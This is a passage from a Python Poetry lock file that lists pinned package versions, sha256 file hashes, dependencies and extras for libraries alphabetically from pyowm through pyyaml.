{file = "pyowm-3.3.0-py3-none-any.whl", hash = "sha256:86463108e7613171531ba306040b43c972b3fc0b0acf73b12c50910cdd2107ab"},
{file = "pyowm-3.3.0.tar.gz", hash = "sha256:8196f77c91eac680676ed5ee484aae8a165408055e3e2b28025cbf60b8681e03"},
]
[package.dependencies]
geojson = ">=2.3.0,<3"
PySocks = ">=1.7.1,<2"
requests = [
{version = ">=2.20.0,<3"},
{version = "*", extras = ["socks"]},
]
[[package]]
name = "pyparsing"
version = "3.1.1"
description = "pyparsing module - Classes and methods to define and execute parsing grammars"
optional = true
python-versions = ">=3.6.8"
files = [
{file = "pyparsing-3.1.1-py3-none-any.whl", hash = "sha256:32c7c0b711493c72ff18a981d24f28aaf9c1fb7ed5e9667c9e84e3db623bdbfb"},
{file = "pyparsing-3.1.1.tar.gz", hash = "sha256:ede28a1a32462f5a9705e07aea48001a08f7cf81a021585011deba701581a0db"},
]
[package.extras]
diagrams = ["jinja2", "railroad-diagrams"]
[[package]]
name = "pypdf"
version = "3.16.4"
description = "A pure-python PDF library capable of splitting, merging, cropping, and transforming PDF files"
optional = true
python-versions = ">=3.6"
files = [
{file = "pypdf-3.16.4-py3-none-any.whl", hash = "sha256:a9b1eaf2db4c2edd93093470d33c3f353235c4a694f8a426a92a8ce77cea9eb7"},
{file = "pypdf-3.16.4.tar.gz", hash = "sha256:01927771b562d4ba84939ef95b393f0179166da786c5db710d07f807c52f480d"},
]
[package.dependencies]
typing_extensions = {version = ">=3.7.4.3", markers = "python_version < \"3.10\""}
[package.extras]
crypto = ["PyCryptodome", "cryptography"]
dev = ["black", "flit", "pip-tools", "pre-commit (<2.18.0)", "pytest-cov", "pytest-socket", "pytest-timeout", "wheel"]
docs = ["myst_parser", "sphinx", "sphinx_rtd_theme"]
full = ["Pillow (>=8.0.0)", "PyCryptodome", "cryptography"]
image = ["Pillow (>=8.0.0)"]
[[package]]
name = "pypdfium2"
version = "4.22.0"
description = "Python bindings to PDFium"
optional = true
python-versions = ">= 3.6"
files = [
{file = "pypdfium2-4.22.0-py3-none-macosx_10_13_x86_64.whl", hash = "sha256:398e4173b9bd2b9cce509b2ed655bbf2bf7b76f408ecf6c099e189996a28bbae"},
{file = "pypdfium2-4.22.0-py3-none-macosx_11_0_arm64.whl", hash = "sha256:9aa3f3357014c1a9e1a45706eca4c214b79b9253447605992c1ede4422e343d9"},
{file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_aarch64.whl", hash = "sha256:5335b128fa7764655e8d9f7349fe8c48293a3f61b4272709e15327a85b72ee90"},
{file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_armv7l.whl", hash = "sha256:5e039a2d6283a5cae7b2b8c1454b7bec08025515b640e2ffd99452d4a85e73f9"},
{file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_i686.whl", hash = "sha256:5d618ba82bbad8ca8a93a0e3dc6d1a5f1d0698a34049de85dd51a4b6b398e696"},
{file = "pypdfium2-4.22.0-py3-none-manylinux_2_17_x86_64.whl", hash = "sha256:5e928c6b37315ef686d3e427f9b30b2f58f1e98bb0622471874c1dde39337f03"},
{file = "pypdfium2-4.22.0-py3-none-musllinux_1_1_aarch64.whl", hash = "sha256:a8afd323889edbdc864881dba833f96c550a0be78a0ddd35040e10adfbce0aa2"},
{file = "pypdfium2-4.22.0-py3-none-musllinux_1_1_i686.whl", hash = "sha256:f6bcedc51327d335ed471f5b8c27a6d6bfad20249f3d79bc79bfe469d93fbe7a"},
{file = "pypdfium2-4.22.0-py3-none-musllinux_1_1_x86_64.whl", hash = "sha256:9101be6fd7f749ab8def0bc5b93f93ec4c45ce0634b9ddcf2cc921d8e08bb763"},
{file = "pypdfium2-4.22.0-py3-none-win32.whl", hash = "sha256:3970154748fc0ee48bb22ffc15a5d66054b6ca553180bb84d743ee8192413549"},
{file = "pypdfium2-4.22.0-py3-none-win_amd64.whl", hash = "sha256:02399c25c1f3d30fa80de616dffc0becd885f4b8a03e7dfae3afb553b49644e3"},
{file = "pypdfium2-4.22.0-py3-none-win_arm64.whl", hash = "sha256:caddf0de2d25e0572a3ddbb7b6c6d60ad9c68290fab593e7a2609f06a88d6fdf"},
{file = "pypdfium2-4.22.0.tar.gz", hash = "sha256:c29d09b59ed65c5f27d81af9c985c89da7b10c0ac3775dfb2474a94a6d6dc850"},
]
[[package]]
name = "pyphen"
version = "0.14.0"
description = "Pure Python module to hyphenate text"
optional = true
python-versions = ">=3.7"
files = [
{file = "pyphen-0.14.0-py3-none-any.whl", hash = "sha256:414c9355958ca3c6a3ff233f65678c245b8ecb56418fb291e2b93499d61cd510"},
{file = "pyphen-0.14.0.tar.gz", hash = "sha256:596c8b3be1c1a70411ba5f6517d9ccfe3083c758ae2b94a45f2707346d8e66fa"},
]
[package.extras]
doc = ["sphinx", "sphinx_rtd_theme"]
test = ["flake8", "isort", "pytest"]
[[package]]
name = "pyproj"
version = "3.5.0"
description = "Python interface to PROJ (cartographic projections and coordinate transformations library)"
optional = true
python-versions = ">=3.8"
files = [
{file = "pyproj-3.5.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:6475ce653880938468a1a1b7321267243909e34b972ba9e53d5982c41d555918"},
{file = "pyproj-3.5.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:61e4ad57d89b03a7b173793b31bca8ee110112cde1937ef0f42a70b9120c827d"},
{file = "pyproj-3.5.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7bdd2021bb6f7f346bfe1d2a358aa109da017d22c4704af2d994e7c7ee0a7a53"},
{file = "pyproj-3.5.0-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5674923351e76222e2c10c58b5e1ac119d7a46b270d822c463035971b06f724b"},
{file = "pyproj-3.5.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cd5e2b6aa255023c4acd0b977590f1f7cc801ba21b4d806fcf6dfac3474ebb83"},
{file = "pyproj-3.5.0-cp310-cp310-win32.whl", hash = "sha256:6f316a66031a14e9c5a88c91f8b77aa97f5454895674541ed6ab630b682be35d"},
{file = "pyproj-3.5.0-cp310-cp310-win_amd64.whl", hash = "sha256:f7c2f4d9681e810cf40239caaca00079930a6d9ee6591139b88d592d36051d82"},
{file = "pyproj-3.5.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7572983134e310e0ca809c63f1722557a040fe9443df5f247bf11ba887eb1229"},
{file = "pyproj-3.5.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:eccb417b91d0be27805dfc97550bfb8b7db94e9fe1db5ebedb98f5b88d601323"},
{file = "pyproj-3.5.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:621d78a9d8bf4d06e08bef2471021fbcb1a65aa629ad4a20c22e521ce729cc20"},
{file = "pyproj-3.5.0-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d9a024370e917c899bff9171f03ea6079deecdc7482a146a2c565f3b9df134ea"},
{file = "pyproj-3.5.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1b7c2113c4d11184a238077ec85e31eda1dcc58ffeb9a4429830e0a7036e787d"},
{file = "pyproj-3.5.0-cp311-cp311-win32.whl", hash = "sha256:a730f5b4c98c8a0f312437873e6e34dbd4cc6dc23d5afd91a6691c62724b1f68"},
{file = "pyproj-3.5.0-cp311-cp311-win_amd64.whl", hash = "sha256:e97573de0ab3bbbcb4c7748bc41f4ceb6da10b45d35b1a294b5820701e7c25f0"},
{file = "pyproj-3.5.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2b708fd43453b985642b737d4a6e7f1d6a0ab1677ffa4e14cc258537b49224b0"},
{file = "pyproj-3.5.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:b60d93a200639e8367c6542a964fd0aa2dbd152f256c1831dc18cd5aa470fb8a"},
{file = "pyproj-3.5.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:38862fe07316ae12b79d82d298e390973a4f00b684f3c2d037238e20e00610ba"},
{file = "pyproj-3.5.0-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:71b65f2a38cd9e16883dbb0f8ae82bdf8f6b79b1b02975c78483ab8428dbbf2f"},
{file = "pyproj-3.5.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b752b7d9c4b08181c7e8c0d9c7f277cbefff42227f34d3310696a87c863d9dd3"},
{file = "pyproj-3.5.0-cp38-cp38-win32.whl", hash = "sha256:b937215bfbaf404ec8f03ca741fc3f9f2c4c2c5590a02ccddddd820ae3c71331"},
{file = "pyproj-3.5.0-cp38-cp38-win_amd64.whl", hash = "sha256:97ed199033c2c770e7eea2ef80ff5e6413426ec2d7ec985b869792f04ab95d05"},
{file = "pyproj-3.5.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:052c49fce8b5d55943a35c36ccecb87350c68b48ba95bc02a789770c374ef819"},
{file = "pyproj-3.5.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:1507138ea28bf2134d31797675380791cc1a7156a3aeda484e65a78a4aba9b62"},
{file = "pyproj-3.5.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c02742ef3d846401861a878a61ef7ad911ea7539d6cc4619ddb52dbdf7b45aee"},
{file = "pyproj-3.5.0-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:385b0341861d3ebc8cad98337a738821dcb548d465576527399f4955ca24b6ed"},
{file = "pyproj-3.5.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8fe6bb1b68a35d07378d38be77b5b2f8dd2bea5910c957bfcc7bee55988d3910"},
{file = "pyproj-3.5.0-cp39-cp39-win32.whl", hash = "sha256:5c4b85ac10d733c42d73a2e6261c8d6745bf52433a31848dd1b6561c9a382da3"},
{file = "pyproj-3.5.0-cp39-cp39-win_amd64.whl", hash = "sha256:1798ff7d65d9057ebb2d017ffe8403268b8452f24d0428b2140018c25c7fa1bc"},
{file = "pyproj-3.5.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:d711517a8487ef3245b08dc82f781a906df9abb3b6cb0ce0486f0eeb823ca570"},
{file = "pyproj-3.5.0-pp38-pypy38_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:788a5dadb532644a64efe0f5f01bf508c821eb7e984f13a677d56002f1e8a67a"},
{file = "pyproj-3.5.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:73f7960a97225812f9b1d7aeda5fb83812f38de9441e3476fcc8abb3e2b2f4de"},
{file = "pyproj-3.5.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:fde5ece4d2436b5a57c8f5f97b49b5de06a856d03959f836c957d3e609f2de7e"},
{file = "pyproj-3.5.0-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e08db25b61cf024648d55973cc3d1c3f1d0818fabf594d5f5a8e2318103d2aa0"},
{file = "pyproj-3.5.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6a87b419a2a352413fbf759ecb66da9da50bd19861c8f26db6a25439125b27b9"},
{file = "pyproj-3.5.0.tar.gz", hash = "sha256:9859d1591c1863414d875ae0759e72c2cffc01ab989dc64137fbac572cc81bf6"},
]
[package.dependencies]
certifi = "*"
[[package]]
name = "pyproject-hooks"
version = "1.0.0"
description = "Wrappers to call pyproject.toml-based build backend hooks."
optional = true
python-versions = ">=3.7"
files = [
{file = "pyproject_hooks-1.0.0-py3-none-any.whl", hash = "sha256:283c11acd6b928d2f6a7c73fa0d01cb2bdc5f07c57a2eeb6e83d5e56b97976f8"},
{file = "pyproject_hooks-1.0.0.tar.gz", hash = "sha256:f271b298b97f5955d53fb12b72c1fb1948c22c1a6b70b315c54cedaca0264ef5"},
]
[package.dependencies]
tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""}
[[package]]
name = "pyre-extensions"
version = "0.0.23"
description = "Type system extensions for use with the pyre type checker"
optional = true
python-versions = "*"
files = [
{file = "pyre-extensions-0.0.23.tar.gz", hash = "sha256:df019263900af45e83e41fb9e889824e8b7bcdb9cb67fe2957bb80104eadcbc7"},
{file = "pyre_extensions-0.0.23-py3-none-any.whl", hash = "sha256:e945fdf4113172cec517c5daeca56f61f6632fd5b8d8165f1253c8865c87e62b"},
]
[package.dependencies]
typing-extensions = "*"
typing-inspect = "*"
[[package]]
name = "pyreadline3"
version = "3.4.1"
description = "A python implementation of GNU readline."
optional = true
python-versions = "*"
files = [
{file = "pyreadline3-3.4.1-py3-none-any.whl", hash = "sha256:b0efb6516fd4fb07b45949053826a62fa4cb353db5be2bbb4a7aa1fdd1e345fb"},
{file = "pyreadline3-3.4.1.tar.gz", hash = "sha256:6f3d1f7b8a31ba32b73917cefc1f28cc660562f39aea8646d30bd6eff21f7bae"},
]
[[package]]
name = "pysocks"
version = "1.7.1"
description = "A Python SOCKS client module. See https://github.com/Anorov/PySocks for more information."
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
files = [
{file = "PySocks-1.7.1-py27-none-any.whl", hash = "sha256:08e69f092cc6dbe92a0fdd16eeb9b9ffbc13cadfe5ca4c7bd92ffb078b293299"},
{file = "PySocks-1.7.1-py3-none-any.whl", hash = "sha256:2725bd0a9925919b9b51739eea5f9e2bae91e83288108a9ad338b2e3a4435ee5"},
{file = "PySocks-1.7.1.tar.gz", hash = "sha256:3f8804571ebe159c380ac6de37643bb4685970655d3bba243530d6558b799aa0"},
]
[[package]]
name = "pyspark"
version = "3.5.0"
description = "Apache Spark Python API"
optional = true
python-versions = ">=3.8"
files = [
{file = "pyspark-3.5.0.tar.gz", hash = "sha256:d41a9b76bd2aca370a6100d075c029e22ba44c5940927877e9435a3a9c566558"},
]
[package.dependencies]
py4j = "0.10.9.7"
[package.extras]
connect = ["googleapis-common-protos (>=1.56.4)", "grpcio (>=1.56.0)", "grpcio-status (>=1.56.0)", "numpy (>=1.15)", "pandas (>=1.0.5)", "pyarrow (>=4.0.0)"]
ml = ["numpy (>=1.15)"]
mllib = ["numpy (>=1.15)"]
pandas-on-spark = ["numpy (>=1.15)", "pandas (>=1.0.5)", "pyarrow (>=4.0.0)"]
sql = ["numpy (>=1.15)", "pandas (>=1.0.5)", "pyarrow (>=4.0.0)"]
[[package]]
name = "pytesseract"
version = "0.3.10"
description = "Python-tesseract is a python wrapper for Google's Tesseract-OCR"
optional = true
python-versions = ">=3.7"
files = [
{file = "pytesseract-0.3.10-py3-none-any.whl", hash = "sha256:8f22cc98f765bf13517ead0c70effedb46c153540d25783e04014f28b55a5fc6"},
{file = "pytesseract-0.3.10.tar.gz", hash = "sha256:f1c3a8b0f07fd01a1085d451f5b8315be6eec1d5577a6796d46dc7a62bd4120f"},
]
[package.dependencies]
packaging = ">=21.3"
Pillow = ">=8.0.0"
[[package]]
name = "pytest"
version = "7.4.3"
description = "pytest: simple powerful testing with Python"
optional = false
python-versions = ">=3.7"
files = [
{file = "pytest-7.4.3-py3-none-any.whl", hash = "sha256:0d009c083ea859a71b76adf7c1d502e4bc170b80a8ef002da5806527b9591fac"},
{file = "pytest-7.4.3.tar.gz", hash = "sha256:d989d136982de4e3b29dabcc838ad581c64e8ed52c11fbe86ddebd9da0818cd5"},
]
[package.dependencies]
colorama = {version = "*", markers = "sys_platform == \"win32\""}
exceptiongroup = {version = ">=1.0.0rc8", markers = "python_version < \"3.11\""}
iniconfig = "*"
packaging = "*"
pluggy = ">=0.12,<2.0"
tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""}
[package.extras]
testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"]
[[package]]
name = "pytest-asyncio"
version = "0.20.3"
description = "Pytest support for asyncio"
optional = false
python-versions = ">=3.7"
files = [
{file = "pytest-asyncio-0.20.3.tar.gz", hash = "sha256:83cbf01169ce3e8eb71c6c278ccb0574d1a7a3bb8eaaf5e50e0ad342afb33b36"},
{file = "pytest_asyncio-0.20.3-py3-none-any.whl", hash = "sha256:f129998b209d04fcc65c96fc85c11e5316738358909a8399e93be553d7656442"},
]
[package.dependencies]
pytest = ">=6.1.0"
[package.extras]
docs = ["sphinx (>=5.3)", "sphinx-rtd-theme (>=1.0)"]
testing = ["coverage (>=6.2)", "flaky (>=3.5.0)", "hypothesis (>=5.7.1)", "mypy (>=0.931)", "pytest-trio (>=0.7.0)"]
[[package]]
name = "pytest-cov"
version = "4.1.0"
description = "Pytest plugin for measuring coverage."
optional = false
python-versions = ">=3.7"
files = [
{file = "pytest-cov-4.1.0.tar.gz", hash = "sha256:3904b13dfbfec47f003b8e77fd5b589cd11904a21ddf1ab38a64f204d6a10ef6"},
{file = "pytest_cov-4.1.0-py3-none-any.whl", hash = "sha256:6ba70b9e97e69fcc3fb45bfeab2d0a138fb65c4d0d6a41ef33983ad114be8c3a"},
]
[package.dependencies]
coverage = {version = ">=5.2.1", extras = ["toml"]}
pytest = ">=4.6"
[package.extras]
testing = ["fields", "hunter", "process-tests", "pytest-xdist", "six", "virtualenv"]
[[package]]
name = "pytest-dotenv"
version = "0.5.2"
description = "A py.test plugin that parses environment files before running tests"
optional = false
python-versions = "*"
files = [
{file = "pytest-dotenv-0.5.2.tar.gz", hash = "sha256:2dc6c3ac6d8764c71c6d2804e902d0ff810fa19692e95fe138aefc9b1aa73732"},
{file = "pytest_dotenv-0.5.2-py3-none-any.whl", hash = "sha256:40a2cece120a213898afaa5407673f6bd924b1fa7eafce6bda0e8abffe2f710f"},
]
[package.dependencies]
pytest = ">=5.0.0"
python-dotenv = ">=0.9.1"
[[package]]
name = "pytest-mock"
version = "3.12.0"
description = "Thin-wrapper around the mock package for easier use with pytest"
optional = false
python-versions = ">=3.8"
files = [
{file = "pytest-mock-3.12.0.tar.gz", hash = "sha256:31a40f038c22cad32287bb43932054451ff5583ff094bca6f675df2f8bc1a6e9"},
{file = "pytest_mock-3.12.0-py3-none-any.whl", hash = "sha256:0972719a7263072da3a21c7f4773069bcc7486027d7e8e1f81d98a47e701bc4f"},
]
[package.dependencies]
pytest = ">=5.0"
[package.extras]
dev = ["pre-commit", "pytest-asyncio", "tox"]
[[package]]
name = "pytest-socket"
version = "0.6.0"
description = "Pytest Plugin to disable socket calls during tests"
optional = false
python-versions = ">=3.7,<4.0"
files = [
{file = "pytest_socket-0.6.0-py3-none-any.whl", hash = "sha256:cca72f134ff01e0023c402e78d31b32e68da3efdf3493bf7788f8eba86a6824c"},
{file = "pytest_socket-0.6.0.tar.gz", hash = "sha256:363c1d67228315d4fc7912f1aabfd570de29d0e3db6217d61db5728adacd7138"},
]
[package.dependencies]
pytest = ">=3.6.3"
[[package]]
name = "pytest-vcr"
version = "1.0.2"
description = "Plugin for managing VCR.py cassettes"
optional = false
python-versions = "*"
files = [
{file = "pytest-vcr-1.0.2.tar.gz", hash = "sha256:23ee51b75abbcc43d926272773aae4f39f93aceb75ed56852d0bf618f92e1896"},
{file = "pytest_vcr-1.0.2-py2.py3-none-any.whl", hash = "sha256:2f316e0539399bea0296e8b8401145c62b6f85e9066af7e57b6151481b0d6d9c"},
]
[package.dependencies]
pytest = ">=3.6.0"
vcrpy = "*"
[[package]]
name = "pytest-watcher"
version = "0.2.6"
description = "Continiously runs pytest on changes in *.py files"
optional = false
python-versions = ">=3.7.0,<4.0.0"
files = [
{file = "pytest-watcher-0.2.6.tar.gz", hash = "sha256:351dfb3477366030ff275bfbfc9f29bee35cd07f16a3355b38bf92766886bae4"},
{file = "pytest_watcher-0.2.6-py3-none-any.whl", hash = "sha256:0a507159d051c9461790363e0f9b2827c1d82ad2ae8966319598695e485b1dd5"},
]
[package.dependencies]
watchdog = ">=2.0.0"
[[package]]
name = "python-arango"
version = "7.7.0"
description = "Python Driver for ArangoDB"
optional = true
python-versions = ">=3.8"
files = [
{file = "python-arango-7.7.0.tar.gz", hash = "sha256:0260ae03c99f5cd786a5c9ba36601c41491566f6e92bbc6b59bf5d91712dd2ce"},
{file = "python_arango-7.7.0-py3-none-any.whl", hash = "sha256:c6e2c6147ba7ed53c9f3a92494b980ad5a4a986b6f11c2e11d5bd183f18d4c5c"},
]
[package.dependencies]
importlib-metadata = ">=4.7.1"
packaging = ">=23.1"
PyJWT = "*"
requests = "*"
requests-toolbelt = "*"
setuptools = ">=42"
urllib3 = ">=1.26.0"
[package.extras]
dev = ["black (>=22.3.0)", "flake8 (>=4.0.1)", "isort (>=5.10.1)", "mock", "mypy (>=0.942)", "pre-commit (>=2.17.0)", "pytest (>=7.1.1)", "pytest-cov (>=3.0.0)", "sphinx", "sphinx-rtd-theme", "types-pkg-resources", "types-requests", "types-setuptools"]
[[package]]
name = "python-dateutil"
version = "2.8.2"
description = "Extensions to the standard Python datetime module"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
files = [
{file = "python-dateutil-2.8.2.tar.gz", hash = "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86"},
{file = "python_dateutil-2.8.2-py2.py3-none-any.whl", hash = "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9"},
]
[package.dependencies]
six = ">=1.5"
[[package]]
name = "python-dotenv"
version = "1.0.0"
description = "Read key-value pairs from a .env file and set them as environment variables"
optional = false
python-versions = ">=3.8"
files = [
{file = "python-dotenv-1.0.0.tar.gz", hash = "sha256:a8df96034aae6d2d50a4ebe8216326c61c3eb64836776504fcca410e5937a3ba"},
{file = "python_dotenv-1.0.0-py3-none-any.whl", hash = "sha256:f5971a9226b701070a4bf2c38c89e5a3f0d64de8debda981d1db98583009122a"},
]
[package.extras]
cli = ["click (>=5.0)"]
[[package]]
name = "python-json-logger"
version = "2.0.7"
description = "A python library adding a json log formatter"
optional = false
python-versions = ">=3.6"
files = [
{file = "python-json-logger-2.0.7.tar.gz", hash = "sha256:23e7ec02d34237c5aa1e29a070193a4ea87583bb4e7f8fd06d3de8264c4b2e1c"},
{file = "python_json_logger-2.0.7-py3-none-any.whl", hash = "sha256:f380b826a991ebbe3de4d897aeec42760035ac760345e57b812938dc8b35e2bd"},
]
[[package]]
name = "pytz"
version = "2023.3.post1"
description = "World timezone definitions, modern and historical"
optional = false
python-versions = "*"
files = [
{file = "pytz-2023.3.post1-py2.py3-none-any.whl", hash = "sha256:ce42d816b81b68506614c11e8937d3aa9e41007ceb50bfdcb0749b921bf646c7"},
{file = "pytz-2023.3.post1.tar.gz", hash = "sha256:7b4fddbeb94a1eba4b557da24f19fdf9db575192544270a9101d8509f9f43d7b"},
]
[[package]]
name = "pytz-deprecation-shim"
version = "0.1.0.post0"
description = "Shims to make deprecation of pytz easier"
optional = true
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7"
files = [
{file = "pytz_deprecation_shim-0.1.0.post0-py2.py3-none-any.whl", hash = "sha256:8314c9692a636c8eb3bda879b9f119e350e93223ae83e70e80c31675a0fdc1a6"},
{file = "pytz_deprecation_shim-0.1.0.post0.tar.gz", hash = "sha256:af097bae1b616dde5c5744441e2ddc69e74dfdcb0c263129610d85b87445a59d"},
]
[package.dependencies]
"backports.zoneinfo" = {version = "*", markers = "python_version >= \"3.6\" and python_version < \"3.9\""}
tzdata = {version = "*", markers = "python_version >= \"3.6\""}
[[package]]
name = "pyvespa"
version = "0.33.0"
description = "Python API for vespa.ai"
optional = true
python-versions = ">=3.6"
files = [
{file = "pyvespa-0.33.0-py3-none-any.whl", hash = "sha256:2681910b3ac5f0259a9e41e6e2649caba2801e836b4c295cc2e48ab25b09672c"},
{file = "pyvespa-0.33.0.tar.gz", hash = "sha256:be3da9022276555b6b25c40b6e846db6e9dbf617486001ba92235ccfab6c9353"},
]
[package.dependencies]
aiohttp = "*"
cryptography = "*"
docker = "*"
jinja2 = "*"
pandas = "*"
requests = "*"
tenacity = "*"
[package.extras]
full = ["keras-tuner", "onnxruntime", "tensorflow", "tensorflow-ranking", "torch (<1.13)", "transformers"]
ml = ["keras-tuner", "tensorflow", "tensorflow-ranking", "torch (<1.13)", "transformers"]
[[package]]
name = "pywin32"
version = "306"
description = "Python for Window Extensions"
optional = false
python-versions = "*"
files = [
{file = "pywin32-306-cp310-cp310-win32.whl", hash = "sha256:06d3420a5155ba65f0b72f2699b5bacf3109f36acbe8923765c22938a69dfc8d"},
{file = "pywin32-306-cp310-cp310-win_amd64.whl", hash = "sha256:84f4471dbca1887ea3803d8848a1616429ac94a4a8d05f4bc9c5dcfd42ca99c8"},
{file = "pywin32-306-cp311-cp311-win32.whl", hash = "sha256:e65028133d15b64d2ed8f06dd9fbc268352478d4f9289e69c190ecd6818b6407"},
{file = "pywin32-306-cp311-cp311-win_amd64.whl", hash = "sha256:a7639f51c184c0272e93f244eb24dafca9b1855707d94c192d4a0b4c01e1100e"},
{file = "pywin32-306-cp311-cp311-win_arm64.whl", hash = "sha256:70dba0c913d19f942a2db25217d9a1b726c278f483a919f1abfed79c9cf64d3a"},
{file = "pywin32-306-cp312-cp312-win32.whl", hash = "sha256:383229d515657f4e3ed1343da8be101000562bf514591ff383ae940cad65458b"},
{file = "pywin32-306-cp312-cp312-win_amd64.whl", hash = "sha256:37257794c1ad39ee9be652da0462dc2e394c8159dfd913a8a4e8eb6fd346da0e"},
{file = "pywin32-306-cp312-cp312-win_arm64.whl", hash = "sha256:5821ec52f6d321aa59e2db7e0a35b997de60c201943557d108af9d4ae1ec7040"},
{file = "pywin32-306-cp37-cp37m-win32.whl", hash = "sha256:1c73ea9a0d2283d889001998059f5eaaba3b6238f767c9cf2833b13e6a685f65"},
{file = "pywin32-306-cp37-cp37m-win_amd64.whl", hash = "sha256:72c5f621542d7bdd4fdb716227be0dd3f8565c11b280be6315b06ace35487d36"},
{file = "pywin32-306-cp38-cp38-win32.whl", hash = "sha256:e4c092e2589b5cf0d365849e73e02c391c1349958c5ac3e9d5ccb9a28e017b3a"},
{file = "pywin32-306-cp38-cp38-win_amd64.whl", hash = "sha256:e8ac1ae3601bee6ca9f7cb4b5363bf1c0badb935ef243c4733ff9a393b1690c0"},
{file = "pywin32-306-cp39-cp39-win32.whl", hash = "sha256:e25fd5b485b55ac9c057f67d94bc203f3f6595078d1fb3b458c9c28b7153a802"},
{file = "pywin32-306-cp39-cp39-win_amd64.whl", hash = "sha256:39b61c15272833b5c329a2989999dcae836b1eed650252ab1b7bfbe1d59f30f4"},
]
[[package]]
name = "pywinpty"
version = "2.0.12"
description = "Pseudo terminal support for Windows from Python."
optional = false
python-versions = ">=3.8"
files = [
{file = "pywinpty-2.0.12-cp310-none-win_amd64.whl", hash = "sha256:21319cd1d7c8844fb2c970fb3a55a3db5543f112ff9cfcd623746b9c47501575"},
{file = "pywinpty-2.0.12-cp311-none-win_amd64.whl", hash = "sha256:853985a8f48f4731a716653170cd735da36ffbdc79dcb4c7b7140bce11d8c722"},
{file = "pywinpty-2.0.12-cp312-none-win_amd64.whl", hash = "sha256:1617b729999eb6713590e17665052b1a6ae0ad76ee31e60b444147c5b6a35dca"},
{file = "pywinpty-2.0.12-cp38-none-win_amd64.whl", hash = "sha256:189380469ca143d06e19e19ff3fba0fcefe8b4a8cc942140a6b863aed7eebb2d"},
{file = "pywinpty-2.0.12-cp39-none-win_amd64.whl", hash = "sha256:7520575b6546db23e693cbd865db2764097bd6d4ef5dc18c92555904cd62c3d4"},
{file = "pywinpty-2.0.12.tar.gz", hash = "sha256:8197de460ae8ebb7f5d1701dfa1b5df45b157bb832e92acba316305e18ca00dd"},
]
[[package]]
name = "pyyaml"
version = "6.0.1"
description = "YAML parser and emitter for Python"
optional = false
python-versions = ">=3.6"
files = [
{file = "PyYAML-6.0.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d858aa552c999bc8a8d57426ed01e40bef403cd8ccdd0fc5f6f04a00414cac2a"},
{file = "PyYAML-6.0.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:fd66fc5d0da6d9815ba2cebeb4205f95818ff4b79c3ebe268e75d961704af52f"},
{file = "PyYAML-6.0.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:69b023b2b4daa7548bcfbd4aa3da05b3a74b772db9e23b982788168117739938"},
{file = "PyYAML-6.0.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:81e0b275a9ecc9c0c0c07b4b90ba548307583c125f54d5b6946cfee6360c733d"},
{file = "PyYAML-6.0.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba336e390cd8e4d1739f42dfe9bb83a3cc2e80f567d8805e11b46f4a943f5515"},
{file = "PyYAML-6.0.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:326c013efe8048858a6d312ddd31d56e468118ad4cdeda36c719bf5bb6192290"},
{file = "PyYAML-6.0.1-cp310-cp310-win32.whl", hash = "sha256:bd4af7373a854424dabd882decdc5579653d7868b8fb26dc7d0e99f823aa5924"},
{file = "PyYAML-6.0.1-cp310-cp310-win_amd64.whl", hash = "sha256:fd1592b3fdf65fff2ad0004b5e363300ef59ced41c2e6b3a99d4089fa8c5435d"},
